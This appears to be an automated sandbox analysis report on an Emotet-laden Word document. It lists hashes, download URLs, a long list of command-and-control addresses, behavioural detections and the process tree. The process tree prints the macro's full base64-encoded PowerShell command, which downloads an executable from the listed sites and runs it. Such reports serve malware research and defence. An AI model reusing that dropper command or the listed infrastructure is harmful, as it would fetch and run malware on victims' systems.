Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
31-07-2020 19:29
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e2_0bd2032e1ffe665517a03c7cbbea75705c7cf7af00789df956c635d752939ad6_2020-07-31__192844._doc.doc
Resource
win7
General
-
Target
emotet_e2_0bd2032e1ffe665517a03c7cbbea75705c7cf7af00789df956c635d752939ad6_2020-07-31__192844._doc.doc
-
Size
174KB
-
MD5
798883953154bcafba38ff977602a41b
-
SHA1
05b09f38c6fd1e93dd5d4ae67f5613bb956b9fa2
-
SHA256
0bd2032e1ffe665517a03c7cbbea75705c7cf7af00789df956c635d752939ad6
-
SHA512
53d1535bef11505ce63cf6b3dc90eceb42b24850cab7a4dfc8b26900fab262e76a1cf57d3c31fe478c5b0100da154d0c63d058315024640bc8a8499a38eec688
Malware Config
Extracted
http://nwcsvcs.com/cgi-bin/uz6_qs8_qr/
http://odessaresources.com/cgi-bin/3_o_but9/
https://onefarmdesign.com/cgi-bin/u_fig_m2mv/
http://onewithyoucd.com/_mm/oix_ktcpc_dljhsex/
http://www.piemonteitinera.net/n_g2o4_jumkt4/
Extracted
emotet
142.105.151.124:443
62.108.54.22:8080
212.51.142.238:8080
71.208.216.10:80
108.48.41.69:80
83.110.223.58:443
210.165.156.91:80
104.131.44.150:8080
104.236.246.93:8080
5.39.91.110:7080
209.141.54.221:8080
209.182.216.177:443
153.126.210.205:7080
91.211.88.52:7080
180.92.239.110:8080
183.101.175.193:80
162.241.92.219:8080
87.106.139.101:8080
114.146.222.200:80
65.111.120.223:80
113.160.130.116:8443
190.160.53.126:80
62.75.141.82:80
46.105.131.87:80
203.153.216.189:7080
46.105.131.79:8080
91.231.166.124:8080
81.2.235.111:8080
189.212.199.126:443
95.9.185.228:443
169.239.182.217:8080
47.153.182.47:80
116.203.32.252:8080
139.130.242.43:80
75.139.38.211:80
41.60.200.34:80
47.144.21.12:443
103.86.49.11:8080
95.179.229.244:8080
173.91.22.41:80
70.167.215.250:8080
110.145.77.103:80
85.59.136.180:8080
5.196.74.210:8080
24.234.133.205:80
76.27.179.47:80
104.131.11.150:443
87.106.136.232:8080
61.19.246.238:443
201.173.217.124:443
176.111.60.55:8080
200.55.243.138:8080
74.208.45.104:8080
139.59.60.244:8080
67.241.24.163:8080
24.43.99.75:80
93.51.50.171:8080
109.74.5.95:8080
137.59.187.107:8080
37.139.21.175:8080
157.245.99.39:8080
124.45.106.173:443
47.146.117.214:80
95.213.236.64:8080
62.138.26.28:8080
190.55.181.54:443
24.179.13.119:80
152.168.248.128:443
222.214.218.37:4143
168.235.67.138:7080
181.230.116.163:80
121.124.124.40:7080
79.98.24.39:8080
37.187.72.193:8080
162.154.38.103:80
78.24.219.147:8080
200.41.121.90:80
185.94.252.104:443
50.116.86.205:8080
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3424 wrote to memory of 1652 3424 849.exe 78 PID 3424 wrote to memory of 1652 3424 849.exe 78 PID 3424 wrote to memory of 1652 3424 849.exe 78 -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
resource yara_rule behavioral2/memory/3424-10-0x0000000000600000-0x000000000060C000-memory.dmp emotet behavioral2/memory/3424-10-0x0000000000600000-0x000000000060C000-memory.dmp emotet behavioral2/memory/1652-13-0x0000000000590000-0x000000000059C000-memory.dmp emotet behavioral2/memory/1652-13-0x0000000000590000-0x000000000059C000-memory.dmp emotet -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\TaskApis\bcryptprimitives.exe 849.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3488 WINWORD.EXE 3488 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2636 powersheLL.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2636 powersheLL.exe 2636 powersheLL.exe 2636 powersheLL.exe 1652 bcryptprimitives.exe 1652 bcryptprimitives.exe 1652 bcryptprimitives.exe 1652 bcryptprimitives.exe -
Blacklisted process makes network request 1 IoCs
flow pid Process 17 2636 powersheLL.exe -
Executes dropped EXE 2 IoCs
pid Process 3424 849.exe 1652 bcryptprimitives.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3424 849.exe 1652 bcryptprimitives.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2636 900 powersheLL.exe 66
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_0bd2032e1ffe665517a03c7cbbea75705c7cf7af00789df956c635d752939ad6_2020-07-31__192844._doc.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:3488
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABaAEMAUQBEAFgAeABwAGIAPQAnAFoAWABHAE0ASwBjAHgAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAGAAUgBgAGkAVAB5AHAAcgBPAFQAYABPAEMATwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQATwBJAEcARwBJAGIAdABwACAAPQAgACcAOAA0ADkAJwA7ACQAQQBZAEsAUABVAGkAbABxAD0AJwBZAEgARgBOAEsAYwBjAG8AJwA7ACQAVwBGAEIATgBTAHMAdgBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAEkARwBHAEkAYgB0AHAAKwAnAC4AZQB4AGUAJwA7ACQAUwBIAEUAWQBRAHAAdgB1AD0AJwBDAFgARQBKAFcAZQBkAHAAJwA7ACQARgBHAFYATQBUAGgAaQBiAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAFcARQBCAEMATABpAEUATgBUADsAJABOAFEAQwBLAE0AdwBhAHkAPQAnAGgAdAB0AHAAOgAvAC8AbgB3AGMAcwB2AGMAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHUAegA2AF8AcQBzADgAXwBxAHIALwAqAGgAdAB0AHAAOgAvAC8AbwBkAGUAcwBzAGEAcgBlAHMAbwB1AHIAYwBlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwAzAF8AbwBfAGIAdQB0ADkALwAqAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBmAGEAcgBtAGQAZQBzAGkAZwBuAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AdQBfAGYAaQBnAF8AbQAyAG0AdgAvACoAaAB0AHQAcAA6AC8ALwBvAG4AZQB3AGkAdABoAHkAbwB1AGMAZAAuAGMAbwBtAC8AXwBtAG0ALwBvAGkAeABfAGsAdABjAHAAYwBfAGQAbABqAGgAcwBlAHgALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBwAGkAZQBtAG8AbgB0AGUAaQB0AGkAbgBlAHIAYQAuAG4AZQB0AC8AbgBfAGcAMgBvADQAXwBqAHUAbQBrAHQANAAvACcALgAiAHMAYABwAEwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUABOAFcAVgBMAGcAaABjAD0AJwBUAEsAVgBLAEgAbwBkAHQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAUABIAEgAWgBpAGMAcgAgAGkAbgAgACQATgBRAEMASwBNAHcAYQB5ACkAewB0AHIAeQB7ACQARgBHAFYATQBUAGgAaQBiAC4AIgBkAE8AdwBOAGwATwBBAGQAZgBgAEkAYABsAEUAIgAoACQARgBQAEgASABaAGkAYwByACwAIAAkAFcARgBCAE4AUwBzAHYAcwApADsAJABMAEIASABVAFQAegBhAGoAPQAnAEQATwBMAEIASgB2AHUAbgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAFcARgBCAE4AUwBzAHYAcwApAC4AIgBsAGUAbgBnAGAAVABIACIAIAAtAGcAZQAgADIAMAA3ADcAMwApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAGAARQBhAFQAZQAiACgAJABXAEYAQgBOAFMAcwB2AHMAKQA7ACQAWABWAFgAUgBPAHUAYwBrAD0AJwBTAFAAUQBHAEQAcQByAG4AJwA7AGIAcgBlAGEAawA7ACQAVQBVAFgAVQBDAG4AZABuAD0AJwBTAEEAQQBQAFUAbgBmAHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATgBLAFQAWgBRAG8AcABxAD0AJwBOAEkASABLAFMAaQB1AHMAJwA=1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
PID:2636
-
C:\Users\Admin\849.exeC:\Users\Admin\849.exe1⤵
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3424 -
C:\Windows\SysWOW64\TaskApis\bcryptprimitives.exe"C:\Windows\SysWOW64\TaskApis\bcryptprimitives.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1652
-